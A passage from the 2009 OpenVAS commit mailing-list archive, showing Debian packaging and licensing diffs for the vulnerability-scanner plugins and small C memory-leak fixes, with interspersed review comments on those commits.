- a manner at least as prominent as such other comparable authorship - credit. - - 5. 
Representations, Warranties and Disclaimer - - UNLESS OTHERWISE AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS - THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND - CONCERNING THE MATERIALS, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, - INCLUDING, WITHOUT LIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY, - FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF - LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE OF - ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW - THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY - TO YOU. - - 6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY - APPLICABLE LAW, IN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY - LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR - EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, - EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. - - 7. Termination - a. This License and the rights granted hereunder will terminate - automatically upon any breach by You of the terms of this License. - Individuals or entities who have received Derivative Works or - Collective Works from You under this License, however, will not - have their licenses terminated provided such individuals or - entities remain in full compliance with those licenses. Sections - 1, 2, 5, 6, 7, and 8 will survive any termination of this License. - b. Subject to the above terms and conditions, the license granted - here is perpetual (for the duration of the applicable copyright in - the Work). 
Notwithstanding the above, Licensor reserves the right - to release the Work under different license terms or to stop - distributing the Work at any time; provided, however that any such - election will not serve to withdraw this License (or any other - license that has been, or is required to be, granted under the - terms of this License), and this License will continue in full - force and effect unless terminated as stated above. - - 8. Miscellaneous - a. Each time You distribute or publicly digitally perform the Work or - a Collective Work, the Licensor offers to the recipient a license - to the Work on the same terms and conditions as the license - granted to You under this License. - b. Each time You distribute or publicly digitally perform a - Derivative Work, Licensor offers to the recipient a license to the - original Work on the same terms and conditions as the license - granted to You under this License. - c. If any provision of this License is invalid or unenforceable under - applicable law, it shall not affect the validity or enforceability - of the remainder of the terms of this License, and without further - action by the parties to this agreement, such provision shall be - reformed to the minimum extent necessary to make such provision - valid and enforceable. - d. No term or provision of this License shall be deemed waived and no - breach consented to unless such waiver or consent shall be in - writing and signed by the party to be charged with such waiver or - consent. - e. This License constitutes the entire agreement between the parties - with respect to the Work licensed here. There are no - understandings, agreements or representations with respect to the - Work not specified here. Licensor shall not be bound by any - additional provisions that may appear in any communication from - You. This License may not be modified without the mutual written - agreement of the Licensor and You. 
- - Creative Commons is not a party to this License, and makes no warranty - whatsoever in connection with the Work. Creative Commons will not be - liable to You or any party on any legal theory for any damages - whatsoever, including without limitation any general, special, - incidental or consequential damages arising in connection to this - license. Notwithstanding the foregoing two (2) sentences, if Creative - Commons has expressly identified itself as the Licensor hereunder, it - shall have all rights and obligations of Licensor. - - Except for the limited purpose of indicating to the public that the - Work is licensed under the CCPL, neither party will use the trademark - "Creative Commons" or any related trademark or logo of Creative - Commons without the prior written consent of Creative Commons. Any - permitted use will be in compliance with Creative Commons' - then-current trademark usage guidelines, as may be published on its - website or otherwise made available upon request from time to time. - - Creative Commons may be contacted at http://creativecommons.org/. - -Other plugins ------------- - -The following plugins do not hold a GPL license: - -netware_post_perl.nasl is (c) 2002 visigoth - - This script is distributed under a BSD style license - allowing free use and continued development provided - the above Copyright message remains. - Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 22:43:44 UTC (rev 5410) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 22:46:52 UTC (rev 5411) 
@@ -1,3 +1,4 @@ 01_makefile_fix_distclean.dpatch 02_adjust_examples.dpatch 03_makefile_clean_space.dpatch + Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 22:43:44 UTC (rev 5410) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 22:46:52 UTC (rev 5411) @@ -6,7 +6,7 @@ include /usr/share/dpatch/dpatch.make -tmp := $(CURDIR)/debian/openvas-plugins +tmp := $(CURDIR)/debian/openvas-plugins-dfsg CFLAGS := -g -Wall ifneq "$(findstring noopt,$(DEB_BUILD_OPTIONS))" "" @@ -19,7 +19,6 @@ build-stamp: config.status dh_testdir $(MAKE) - ( cd audit && sh exclude-plugins >exclude-list ) touch $@ config.status: configure patch @@ -33,18 +32,13 @@ dh_testroot touch openvas.tmpl [ ! -f Makefile ] || $(MAKE) distclean - -rm -rf audit/exclude-list dh_clean build-stamp install: build-stamp dh_testdir dh_testroot dh_clean -k -# Before we install we audit the plugins available -# If the audit passes we continue $(MAKE) install prefix=$(tmp)/usr sysconfdir=$(tmp)/etc localstatedir=$(tmp)/var/run libdir=$(tmp)/var/lib - ( cd $(tmp)/var/lib/openvas/plugins ; cat $(CURDIR)/audit/exclude-list $(CURDIR)/audit/remove-list | xargs rm -f ) - ( cd audit && sh audit-plugins $(tmp)/var/lib/openvas/plugins ) rm -rf $(tmp)/var/run binary-indep: From scm-commit at wald.intevation.org Wed Oct 7 00:51:07 2009 
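Review bot: the debian/patches/00list hunk in r5411 adds only an empty line after 03_makefile_clean_space.dpatch, while the new 1.0.4-1 changelog entry in the same commit attributes the NASL relicensing to [04_free_plugins.dpatch]. dpatch applies only what 00list names, so either add 04_free_plugins.dpatch to the list (and to the commit) or drop the reference from the changelog, and remove the stray blank line. In the debian/copyright hunk, the "Other plugins" paragraph with the BSD-style terms for netware_post_perl.nasl is deleted while visigoth remains in the new author list; if that script still ships, its licence note needs to stay. The debian/control hunk also leaves the source stanza at `Section: admin` while the binary stanza gains `Section: net`, although the changelog says "Set section to net"; make the two agree.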
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:51:07 +0200 (CEST) Subject: [Openvas-commits] r5412 - in trunk/openvas-scanner: . openvassd Message-ID: <20091006225107.D5DA9861EAAA@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 00:51:07 +0200 (Wed, 07 Oct 2009) New Revision: 5412 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/openvassd/utils.c Log: Fixed memory leak, typos and resource leak. Also added todo for TOCTOU race condition on temp_file_name() (details sent to openvas-devel@) Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-06 22:46:52 UTC (rev 5411) +++ trunk/openvas-scanner/ChangeLog 2009-10-06 22:51:07 UTC (rev 5412) @@ -1,3 +1,9 @@ +2009-10-06 Tim Brown + + * openvassd/utils.c: Fixed memory leak, typos and resource leak. Also added + todo for TOCTOU race condition on temp_file_name() (details sent to + openvas-devel@). + 2009-10-06 Michael Wiegand Post-release version bump. Modified: trunk/openvas-scanner/openvassd/utils.c =================================================================== --- trunk/openvas-scanner/openvassd/utils.c 2009-10-06 22:46:52 UTC (rev 5411) +++ trunk/openvas-scanner/openvassd/utils.c 2009-10-06 22:51:07 UTC (rev 5412) @@ -330,8 +330,9 @@ f = fopen(fname, "w"); if(!f) { -fprintf(stderr, "'%s'\n", fname); + fprintf(stderr, "'%s'\n", fname); perror("create_pid_file() : open "); + free(fname); return; } fprintf(f, "%d\n", getpid()); @@ -356,7 +357,7 @@ * This function ensures that this name is not taken * already. */ -/** @todo consider using glib functions */ +/** @todo consider using glib functions, the current code is subject to a TOCTOU race condition */ char* temp_file_name() { @@ -365,7 +366,7 @@ do { if(fd > 0){ if(close(fd) < 0) - perror("close "); + perror("close"); } sprintf(ret, "%s/tmp", OPENVASSD_STATEDIR); mkdir(ret, 0700); 
@@ -373,6 +374,8 @@ fd = open(ret, O_RDONLY); } while (fd >= 0); + if(close(fd) < 0) + perror("close"); return ret; } From scm-commit at wald.intevation.org Wed Oct 7 00:54:17 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:54:17 +0200 (CEST) Subject: [Openvas-commits] r5413 - in trunk/openvas-manager: . src Message-ID: <20091006225417.EC29A861EAB2@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 00:54:16 +0200 (Wed, 07 Oct 2009) New Revision: 5413 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/otp.c Log: Fixed memory leak Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-06 22:51:07 UTC (rev 5412) +++ trunk/openvas-manager/ChangeLog 2009-10-06 22:54:16 UTC (rev 5413) @@ -1,3 +1,7 @@ +2009-10-06 Tim Brown + + * src/otp.c: Fixed memoey leak. + 2009-10-06 Matthew Mundell * src/tasks_sql.h (init_manage): Log database versions on version failure. Modified: trunk/openvas-manager/src/otp.c =================================================================== --- trunk/openvas-manager/src/otp.c 2009-10-06 22:51:07 UTC (rev 5412) +++ trunk/openvas-manager/src/otp.c 2009-10-06 22:54:16 UTC (rev 5413) @@ -1020,6 +1020,7 @@ set_scanner_state (SCANNER_PLUGIN_LIST_OID); from_scanner_start += match + 1 - *messages; *messages = match + 1; + g_free (value); return 0; } return -2; From scm-commit at wald.intevation.org Wed Oct 7 00:56:33 2009 
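Review bot: the `close(fd)` added after the do/while loop in temp_file_name() (openvassd/utils.c, r5412, hunk @@ -373,6 +374,8 @@) can never succeed. The loop exits only when `open(ret, O_RDONLY)` returned a negative value, so the new lines call close() on an invalid descriptor, get EBADF, and print a spurious "close" error on every call. Descriptors from successful opens are already closed at the top of the next iteration, so the two added lines should be dropped. The guard there is `if(fd > 0)`, which would skip a valid descriptor 0; `fd >= 0` is the matching test. For the TOCTOU noted in the new @todo, probing with open() and returning a name leaves a window before the caller creates the file; creating it atomically (mkstemp(), or open() with O_CREAT|O_EXCL) and returning the descriptor closes that window. The `free(fname)` on the fopen() failure path in create_pid_file() looks right.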
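Review bot: the ChangeLog entry in r5413 reads "Fixed memoey leak"; that should be "memory". In src/otp.c the new `g_free (value);` covers the `return 0` branch only, and the `return -2;` immediately after the closing brace is not touched by the hunk. Please confirm that `value` is not still allocated when that path is taken, and free it there too if it is.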
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:56:33 +0200 (CEST) Subject: [Openvas-commits] r5414 - in trunk/openvas-packaging/openvas-plugins/debian/trunk/debian: . old-config patches Message-ID: <20091006225633.AA508861EAAC@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 00:56:33 +0200 (Wed, 07 Oct 2009) New Revision: 5414 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.config trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.postinst trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.templates trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/po/ Removed: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules Log: New package version (1.0.7) which tries to provide the openvas-nvt-sync script as well as some plugins. 
Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO 2009-10-06 22:56:33 UTC (rev 5414) @@ -1,5 +1,6 @@ -- Update the debconf questions, they still talk about Nessus - --> update also the translations +- Update the plugins to the latest SVN release and change the package + numbering to reflect dates -- See if the debconf questions are still relevant for OpenVAS +- Find scripts refering to the Nessus Sript License and modify them + to refer to the GPL instead Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:56:33 UTC (rev 5414) 
@@ -1,3 +1,50 @@ +openvas-plugins-dfsg (1.0.7-2) unstable; urgency=low + + * Provide this package in Debian which includes the openvas-nvt-sync required + by openvas-server as well as some basic plugins (Closes: #532937, #534846) + * Restore audit, docs/, extras/ and scripts/ and review all components + to ensure they are free. The list of removed plugins is in + audit/removed-plugins, these include: + - NASL scripts without an explict license being refered in the header + - all of Gentoo plugins (glsa_2xxx) since the Gentoo advisories are + licensed under the Creative Commons by-sa version 2.0/version 2.5 + which is DFSG incompatible (only 3.0 is compatible) + * Add a audit/REMOVED-PLUGINs file listing the plugins removed + * Describe the status of this package in a new 'README' debian file + * Move rsync to Depends: since it is required by the openvas-nvt-sync + script and the purpose of this package is to provide it. + * Move again snmp to Recommends: as most networks use SNMP for + network management + * Create audit/generate-license-list script in order to generate a + list of all scripts based on license and make it easier to find + those scripts that do not have any license reference. + * Update George A. Theall's script describe-nessus-plugins to version 2.24, + dated june 2009) and removed 'update-nessus-plugins' since it's not + any longer useful. + * Restore packages' preinst/postrm which were lost in previous version + * Move the old packages config/templates/po to a separate directory. 
They are + not need currently (but might be useful in the future) + * Add a debian/TODO + * Add a Conflicts: on openvas-server (2.0.3-2 and previous) due to the + openvas-nvt-sync script + * Write a manual page for the openvas-nvt-sync script + + -- Javier Fernandez-Sanguino Pen~a Sun, 20 Sep 2009 02:13:11 +0200 + +openvas-plugins (1.0.7-1) unstable; urgency=low + + * New version based on latest plugins + * Update debian/copyright + * Move snmp to Suggests + * Removed audit/, docs/, extras/ and scripts/ + * Drop the following patches in debian/patches since they are already + included upstream: + 01_makefile_fix_distclean.dpatch + 02_adjust_examples.dpatch + 03_makefile_clean_space.dpatch + + -- Jan Wagner Fri, 18 Sep 2009 13:05:59 +0200 + openvas-plugins-dfsg (1.0.5-0.1) unstable; urgency=low * New upstream release Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 22:56:33 UTC (rev 5414) 
@@ -3,21 +3,29 @@ Priority: optional Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner , Joey Schulze -Build-Depends: debhelper (>= 5.0.0), dpatch, libopenvas1-dev (>= 1.0), openvas-server-dev (>= 1.0), libopenvasnasl1-dev, libgmp3-dev, libz-dev, libpcap0.8-dev | libpcap-dev, nmap, libnet1-dev, libgnutls-dev -Standards-Version: 3.8.0 -Vcs-Browser: http://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-plugins/packaging/debian/?root=openvas -Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-plugins/packaging/debian/ -Homepage: http://www.openvas.org +Build-Depends: debhelper (>= 5), dpatch, libopenvas2-dev, openvas-server-dev (>= 1.0), libopenvasnasl2-dev, libgmp3-dev, libz-dev, libpcap-dev, libnet1-dev, libgnutls-dev, libglib2.0-dev +Homepage: http://www.openvas.org/ +Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/?root=openvas +Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/ +Standards-Version: 3.8.3 Package: openvas-plugins-dfsg Section: net Architecture: any +Depends: ${shlibs:Depends}, ${misc:Depends}, rsync +Recommends: openvas-server (>= 1.0), nmap, smbclient, snmp +Suggests: openvas-client, pnscan, strobe, ike-scan Provides: openvas-plugins -Depends: ${shlibs:Depends}, debconf | debconf-2.0 -Recommends: wget, openvas-server (>= 1.0), nmap, snmp -Description: OpenVAS vulnerability tests - OpenVAS is a network security scanner. It makes possible to test the security - of remote hosts in an attempt to find vulnerable spots that should be fixed. +Conflicts: openvas-plugins, openvas-server (<= 2.0.3-2) +Description: remote network security auditor - plugins + The Open Vulnerability Assessment System is a modular security auditing + tool, used for testing remote systems for vulnerabilities that should be + fixed. . 
- This package contains the OpenVAS plugins, a set of security tests as well - as scripts to build additional plugins. + It is made up of two parts: a server, and a client. The server/daemon, + openvasd, is in charge of the attacks, whereas the client, + OpenVAS-Client, provides an X11/GTK+ user interface. + . + This package contains the DFSG-free OpenVAS plugins, a set of security tests + as well as scripts to build additional plugins. It also provides the + infrastructure for downloading updated plugins from OpenVAS. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 22:56:33 UTC (rev 5414) 
@@ -1,167 +1,128 @@ This package is based on the nessus-plugins package, which was debianized by Josip Rodin on 2 Oct 1999. -Original sources for this software can be found at: http://www.openvas.org/ +It was downloaded from http://www.openvas.org/ -This package is Copyright (C) 1998 - 2007 Renaud Deraison and others. -[ For specific (c) statements see the individual files. ] +Upstream Author: OpenVAS -This package also provides the update-nessus-plugins and -describe-nessus-plugin scripts (provided in the examples directory). -These are copyright (c) 2003, George A. Theall -and they were downloaded from -http://www.tifaware.com/perl/update-nessus-plugins/ -and -http://www.tifaware.com/perl/describe-nessus-plugin/ +Copyright holders: + * Renaud Deraison + * Per Bothner + * Gordon Matzigkeit + * Lukas Grunwald + * Jan-Oliver Wagner + * Michel Arboi / + * Copyright (C) 1998 - 2006 Tenable Network Security, Inc. + * Copyright (C) 2007, DN-Systems Enterprise Internet Solutions GmbH -These scripts are free software; you can redistribute it and/or modify it -under the same terms as Perl itself. + * For the describe-openvas-plugin + Copyright (c) 2003-2009, George A. Theall + For autoconfiguration files: + Copyright (C) 1992-2006 Free Software Foundation, Inc -Files in this package come from many different authors: + The following list includes all of the plugins writers and copyright + holders of NASL scripts under + the 'scripts/' directory: + Noam Rathaus + Patrik Karlsson + Chris Gragsone + David Maciejak + Ferdy Riphagen + Michael Meyer + Renaud Deraison + Charles Thier + Sebastian Andersson + Chris Foster + Josh Zlatin-Amishav + Lionel Cons + Matt Moore + Georges Dagousset + deepquest + Charles Thier + Paul Ewing + George A. 
Theall, + Vincent Renardias + John Lampe (j_lampe at bellsouth.net) + Gregory Duchemin + Brian Smith-Sweeney (brian at smithsweeney.com) + fr0stman + Alexis de Bernis + Mathieu Perrin + Matthew North < matthewnorth at yahoo.com > + Xue Yong Zhi + Javier Fernandez-Sanguino + Rick McCloskey + Carsten Koch-Mauthe + Chandan S + Justin Seitz + H D Moore + Orlando Padilla + Erik Tayler + Forrest Rae + Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com + Copyright (C) 2003 StrongHoldNet + Copyright (c) 2008 Tim Brown and Portcullis Computer Security Ltd - A. Tarasco research. - Adam Baldwin - Alexis de Bernis - Anthony R. Plastino III - Astharot - Audun Larsen - Axel Nennker - Bekrar Chaouki - Brian Smith-Sweeney - Chandan S - Chaouki BEKRAR - Charles Thier - Chris Sullo - Christoff Breytenbach - David Kyger - Davy Van De Moere - Douglas Minderhout - Eli Kara - Erik Anderson - Erik Stephens - Erik Tayler - Farhad Koosha - Felix Huber - Ferdy Riphagen - Filipe Custodio - Forrest Rae - Frank Berger - Geoff Humes - Geoffroy Raimbault - George A. Theall - Georges Dagousset - Giovanni Fiaschi - Gregory Duchemin - H D Moore - Haroon Meer - Hendrik Scholz - Holger Heimann - Holm Diening - Immo Goltz - Intranode - James W. Abendschan - Jan-Oliver Wagner - Jasmin Amidzic . - Jason Haar - Jason Lidow - Javier Fernandez-Sanguino Peña - Javier Munoz Mellid - Javier Olascoaga - Jeff Adams - John Lampe - Jon Passki - Joseph Mlodzianowski - Josh Zlatin-Amishav - Julio César Hernández - Justin Seitz - Jøséph Mlødzianøwski - K-Otik.com - Keith Young - Laurent Facq <@u-bordeaux.fr> - Laurent Kitzinger - Lionel Cons , CERN - Lukas Grunwald - Mathieu Meadele - Mathieu Perrin - Matt Moore - Matthew North < matthewnorth at yahoo.com > - Michael J. Richardson - Michel Arboi - Nicolas Gregoire - Noam Rathaus , Beyond Security Ltd. 
- Orlando Padilla - Pasi Eronen - Patrik Karlsson - Paul Ewing - Paul Johnston - Pavel Kankovsky - Pedro Antonio Nieto Feijoo - Prizm - Randy Matz - Renaud Deraison - Rick McCloskey - Roelof Temmingh - Rui Bernardino - Scott Adkins - Scott Shebby scotts at scanalert.com - Sebastian Andersson - Stefaan Van Dooren - Sullo - Sverre H. Huseby - Tarik El-Yassem - Thomas Reinke - Tim Brown - Tobias Glemser - Tom Ferris - Tomi Hanninen - Veerendra GG - Victor Kirhenshtein - Vincent Renardias - Vlatko Kosturjak - Xue Yong Zhi - Yoav Goldberg - Zorgon - altomo at digitalgangsters.net - chewkeong at security.org.sg - deepquest - fr0stman - tony at libpcap.net - visigoth +License: +The GPL2 (or later) license applies to most of this package contents (but see +below) --------------------------------------------------------------------------- - NASL Scripts --------------------------------------------------------------------------- + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. -All NASL scripts included in this release (unless noted -otherwise in the plugin itself, see below) are distributed -under the GNU General Public License version 2: + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. 
+ You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. +On Debian systems, the complete text of the GNU General Public License +can be found in /usr/share/common-licenses/GPL-2 file. - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - -On Debian systems, full text of the GNU GPL can always be -found in the /usr/share/common-licenses/GPL file. +The following contents are available through only a GPL2 license (not later +versions): + + - configure.in + - openvas-nvt-sync.in + - plugins/3com_hub/3com_hub.c + - plugins/find_service/find_service.c + - plugins/openvas_tcp_scanner/openvas_tcp_scanner.c + +This package also provides the describe-nessus-plugin scripts (provided in the +examples directory). This script is (c) 2003, George A. Theall and was +downloaded from http://www.tifaware.com/perl/describe-nessus-plugin/. +The license for this script is the following: + + These scripts are free software; you can redistribute it and/or modify it + under the same terms as Perl itself. + +-------------------------------------------------------------------------- + Plugins / Scripts +-------------------------------------------------------------------------- + +All of the C and NASL scripts included in this release (unless noted otherwise +in the plugin itself, see below) are distributed under the GNU General Public +License version 2. Whenever a plugin refers to the "Nessus Script License" it +refers to the GPL version 2 license. 
+ The NASL plugins might include text provided from vendor advisories that are distributed under different license contents. Most notably: Debian advisories ----------------- -Debian advisories are (c) 1997-2006 Software in the Public Interest, Inc. -for more information see http://www.debian.org/license +Debian advisories are (c) 1997-2005 Software in the Public Interest, Inc. +for more information see http://www.debian.org/licens This material may be distributed only subject to the terms and conditions set forth in the Open Publication License, Draft v1.0 or later 
@@ -285,3 +246,47 @@ derivative of the work in any standard (paper) book form is prohibited unless prior permission is obtained from the copyright holder.' to the license reference or copy. + + +Other plugins/scripts +--------------------- + +The following plugins hold other free software licenses: + +netware_post_perl.nasl is (c) 2002 visigoth + + This script is distributed under a BSD style license + allowing free use and continued development provided + the above Copyright message remains. + +smtpscan.nasl is Copyright (c) 2002,2003 Julien Bordet + +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions +# are met: +# 1. Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# 2. Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# 3. All advertising materials mentioning features or use of this software +# must display the following acknowledgement: +# This product includes software developed and data gathered by +# Julien Bordet, Renaud Deraison and Michel Arboi, for smtpscan and +# Nessus projects + +www_fingerprinting_hmap.nasl is (C) 2003 Michel Arboi + +# +# Redistribution and use in source, with or without modification, are +# permitted provided that the following conditions are met: +# +# 1. Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# 2. 
All advertising materials mentioning features or use of this software +# must display the following acknowledgement: +# This product includes software developed and data gathered by +# Michel Arboi +# + Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.config (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.postinst (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins.templates (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/po (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po) Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config 2009-10-06 22:56:33 UTC (rev 5414) 
@@ -1,60 +0,0 @@ -#!/bin/sh -e -# Config script for openvas-plugins -# (c) 2003-2007 Javier Fernández-Sanguino -# Some ideas stolen from the geneweb package (and contributed by -# Christian Perrier) - -. /usr/share/debconf/confmodule -db_version 2.0 || [ $? -lt 30 ] -db_title "OpenVAS plugins" - - -find_updated_plugs () { - DIST_PLIST=`mktemp` - ORIG_PLIST=`mktemp` - cat $OPENVASPLIST | sort > $DIST_PLIST - find $PLUGINDIR -maxdepth 1 -type f | sort > $ORIG_PLIST - comm -13 $DIST_PLIST $ORIG_PLIST - rm -f $ORIG_PLIST $DIST_PLIST - return 0 -} - -PLUGINDIR=/var/lib/openvas/plugins/ -OPENVASPLIST=/var/lib/dpkg/info/openvas-plugins.list -MAX_ENTRIES=5 -[ -d $PLUGINDIR ] && ( [ "$1" = "configure" ] || [ "$1" = "reconfigure" ] ) && { -# We need to remove _all_ the plugins in the previous installation -# otherwise there might be stuff which we do not want - - newplugs="`find_updated_plugs`" - if [ -n "$newplugs" ] ; then - countnewplugs="`echo $newplugs |wc -l`" - else - countnewplugs=0 - fi - if [ -n "$newplugs" ] || [ "$1" = "reconfigure" ] ; then - -# I'm not convinced that there is any need to list all the plugins -# which are new here. This question could even be asked regardless -# of wether there are new plugins or not... 
(jfs) -# if [ $countnewplugs -gt $MAX_ENTRIES ] ; then - # List should be limited to, say, 5 entries at most to avoid - # filling up the screen -# newplugs="`echo $newplugs |head -$MAX_ENTRIES`" -# newplugs="$newplugs (...)" -# fi -# newplugs=`echo $newplugs | perl -pe 's/\n/, /g'` -# db_subst openvas-plugins/remove_unknown newplugs "$newplugs" || true - -# This will give an indication of the stuff that will be removed - db_subst openvas-plugins/remove_unknown countnewplugs "$countnewplugs" || true -# Ask the question - db_input medium openvas-plugins/remove_unknown || true - fi -} - -#DEBHELPER# - -db_go - -exit 0 Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 22:56:33 UTC (rev 5414) @@ -1,3 +1,2 @@ -var/lib/openvas/.desc-plugins var/lib/openvas/plugins var/lib/openvas/plugins-factory Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst 2009-10-06 22:56:33 UTC (rev 5414) 
